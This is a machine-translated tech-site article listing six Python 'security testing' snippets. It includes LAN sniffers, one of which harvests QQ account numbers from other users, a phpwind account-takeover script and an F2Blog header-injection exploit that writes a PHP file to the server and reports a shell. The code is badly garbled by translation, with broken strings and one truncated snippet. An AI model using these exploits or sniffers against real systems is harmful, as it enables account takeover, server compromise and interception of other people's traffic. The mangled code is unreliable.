Shulou(Shulou.com)05/31 Report--

This article introduces you how the six code examples of Python commonly used auxiliary security testing are, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Here are some examples to demonstrate the functionality of python.

1. Data sniffing, in this case, is sniffing the real flash playback address on Tudou.

Import pcap, struct, refrom pickle import dump,loadpack=pcap.pcap () pack.setfilter ('tcp port 80') regx=r'/ [\ w+ | /] + .flv | / [\ w+ | /] + .swf'urls= [] hosts= [] print' start capture....'for recv_time,recv_data in pack: urls=re.findall (regx,recv_data); if (len (urls)! = 0): print urls

2. Sniff the qq number. A few days ago, I used it to sniff all the qq in the LAN. Unfortunately, there is no gender identification function. But you can add it yourself.

#-*-coding: cp936-*-

Import pcap, struct

Pack=pcap.pcap ()

Pack.setfilter ('udp')

Key=''

For recv_time,recv_data in pack:

Recv_len=len (recv_data)

If recv_len = = 102 and recv_data [42] = = chr (02) and recv_data [101]

= = chr (03):

Print struct.unpack ('> recording and recording data [49:53]) [0]

Elif recv_len = = 55:

Print struct.unpack ('> recording and recording data [49:53]) [0]

3, data sniffing, encountered in the project, need to sniff some data sent to a specific port, so it took a few minutes to write a program.

Import pcap, structfrom pickle import dump,loadpack=pcap.pcap () pack.setfilter ('port 2425') f=open

3, file content search, I found that windows's own search can not search content. Even if you find it, it's not allowed. I wrote one myself.

Import os,string,re,sys

Class SevenFile:

Files= []

Def FindContent (self,path):

Print 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'

Walks=os.walk (path)

For walk in walks:

For filename in walk [2]:

If ('.mht' = = filename [- 4:]):

Res_taskid= []

File=walk [0] +'\\'+ filename

F=open (file)

Content=f.read ()

Pattern_taskid=re.compile (r'Stonehenge-UIVerificationChecklist\ .mht', re.IGNORECASE) #

Res_taskid=pattern_taskid.findall (content)

F.close ()

If len (res_taskid) > 0:

Self.files.append (file)

Def run ():

F=SevenFile ()

F.FindContent (r "E:\ work\ AP\ Manual Tests\ PSIGTestProject\ PSIGTestProject")

For filepath in f.files:

Print filepath

Print "OK"

If _ _ name__== "_ _ main__":

Run ()

4. I didn't write this, it's a code of an online × × phpwind forum.

#-*-coding: gb2312-*-

Import urllib2,httplib,sys

Httplib.HTTPConnection.debuglevel = 1

Cookies = urllib2.HTTPCookieProcessor ()

Opener = urllib2.build_opener (cookies)

Def usage ():

Print "Usage:\ n"

Print "$. / phpwind.py pwforumurl usertoattack\ n"

Print "pwforumurl destination forum address such as http://www.80sec.com/"

Print "usertoattack target speckled bamboo or administrator with permission"

Print "× × result will register the same account as the target user in the target forum"

Print "the latest version can be logged in using uid"

Print "other versions can be logged in using cookie+useragent"

Print "#"

Print ""

Argvs=sys.argv

Usage ()

Data = "regname=%s

% s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=...@foo.com&regemailtoall=1&step=2 "

% (argvs [2], "% C1")

Pwurl = "% s/register.php"% argvs [1]

Request = urllib2.Request (

Url = pwurl

Headers = {'Content-Type':' application/x-www-form-

Urlencoded','User-Agent': '80sec owned this'}

Data = data)

F=opener.open (request)

Headers=f.headers.dict

Cookie=headers ["set-cookie"]

Try:

If cookie.index ('winduser'):

Print "Exploit Success!"

Print "Login with uid password @ 80sec or Cookie:"

Print cookie

Print "User-agent: 80sec owned this"

Except:

Print "Error! http://www.80sec.com"

Print "Connect root#80sec.com"

5. × × injection × ×, demonstration of injection for specified websites

#! C:\ python24\ pyton

# Exploit For F2Blog All Version

# Author BY MSN:pt...@vip.sina.com

# Date: Jan 29 2007

Import sys

Import httplib

From urlparse import urlparse

From time import sleep

Def injection (realurl,path,evil): # url,/bk/,evilip

Cmd= ""

Cookie= ""

Header= {'Accept':'*/*','Accept-Language':'zh-

Cn','Referer':' http://'+realurl[1]+path+'index.php','Content-

Type':'application/x-www-form-urlencoded','User-

Agent':useragent,'Host':realurl [1], 'Content-length':len (cmd)

'Connection':'Keep-Alive','X-Forwarded-

For':evil,'Cookie':cookie}

# cmd =

"formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=

% E6%8F%90+%C2%A0+%E4%BA%A4 "

# print header

# print path

# sys.exit (1)

Http = httplib.HTTPConnection (realurl [1])

Http.request ("POST", path+ "index.php", cmd, header)

Sleep (1)

Http1 = httplib.HTTPConnection (realurl [1])

Http1.request ("GET", path+ "cache/test11.php")

Response = http1.getresponse ()

Re1 = response.read ()

# print re1

Print re1.find ('test')

If re1.find ('test') = = 0:

Print 'Expoilt Success!\ n'

Print 'View Your shell:\ t% s'% shell

Sys.exit (1)

Else:

Sys.stdout.write ("Expoilt FALSE!")

Http.close ()

# sleep (1)

# break

Sys.stdout.write ("\ n")

Def main ():

Print 'Exploit For F2Blog All Version'

Print 'Codz by pt...@vip.sina.com\ n'

If len (sys.argv) = = 2:

Url = urlparse (sys.argv [1])

If URL [2:-1]! ='/':

U = url [2] +'/'

Else:

U = url [2] # u=/bk/

Else:

Print "Usage:% s"% sys.argv [0]

Print "Example:% s http://127.0.0.1/bk"% sys.argv [0]

Sys.exit (0)

Print'[+] Connect% s'% url [1]

Print'[+] Trying...'

Print'[+] Plz wait a long long time...'

Global shell,useragent

Shell= "http://"+url[1]+u+"cache/test11.php"

Query = 'fputs (fopen (\' cache/test11.php\',\'w+\'),\ 'test\')'

Query ='\');'+ query+';/*'

Evilip=query

Useragent= ""

Cookie= ""

Injection (url,u,evilip)

Evilip= ""

Injection (url,u,evilip)

Print'[+] Finished'

If _ _ name__ = ='_ _ main__': main ()

6. × × injection × ×, which is a complete access+asp injection tool.

The code is a little long. Download it yourself.

Http://www.xfocus.net/tools/200408/780.html

There are more powerful python injection tools (sqlmap) abroad, which support almost all databases now. MySQL, Oracle, PostgreSQL and Microsoft SQL

Server database management system back-end. Besides these four DBMS

Sqlmap can also identify Microsoft Access, DB2, Informix and Sybase

P.p1 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px 'Helvetica Neue'; color: # e4af0a} p.p2 {margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px' Helvetica Neue'; color: # 454545; min-height: 14.0px} span.s1 {color: # 454545} span.s2 {font: 12.0px'. PingFang SC'; color: # 454545}

About Python commonly used auxiliary security testing 6 code examples are shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.